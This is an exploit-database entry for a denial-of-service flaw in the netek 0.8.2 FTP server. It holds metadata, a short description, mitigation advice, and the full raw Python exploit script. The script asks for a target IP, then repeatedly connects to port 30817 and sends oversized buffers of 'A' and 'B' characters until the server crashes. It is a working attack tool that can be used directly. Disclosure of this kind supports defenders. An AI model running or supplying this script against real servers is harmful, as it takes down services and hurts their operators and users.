netek 0.8.2 FTP Denial of Service

vendor:

netek

by:

Lawrence Amer

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: netek

Affected Version From: 0.8.2

Affected Version To: 0.8.2

Patch Exists: NO

Related CWE: N/A

CPE: netek.berlios

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP, Windows 7

2020

netek 0.8.2 FTP Denial of Service

netek 0.8.2 FTP is vulnerable to Denial of Service attack. An attacker can send a crafted payload of 5000 'A' characters and 1000 'B' characters to the default port 30817 to crash the server. This will cause the CPU usage to reach 100%.

Mitigation:

Disable the FTP service if not required. If required, use a firewall to restrict access to the FTP service from untrusted sources.

Source

Exploit-DB raw data:

#Exploit Title : netek 0.8.2 FTP Denial of Service 
#Test on : windowsXPs3 + windows 7
#software Link :https://sourceforge.net/projects/netek.berlios/
#version : 0.8.2
#author : Lawrence Amer
#site : lawrenceamer.me
#affected product uses default port 30817 , it can be chnaged also 
#!/bin/python
import socket

 
ip = raw_input("[+] IP to attack: ")
 
sarr = []
i = 0
while True:
    try:
        sarr.append(socket.create_connection((ip,30817)))
        print "[+] Connection %d" % i
        crash1 = "\x41"*5000 +"\X42"*1000
        sarr[i].send(crash1+'\r\n')
        i+=1
    except socket.error:
        print "[*] Server crashed with CPU 100!!"
        raw_input()
        break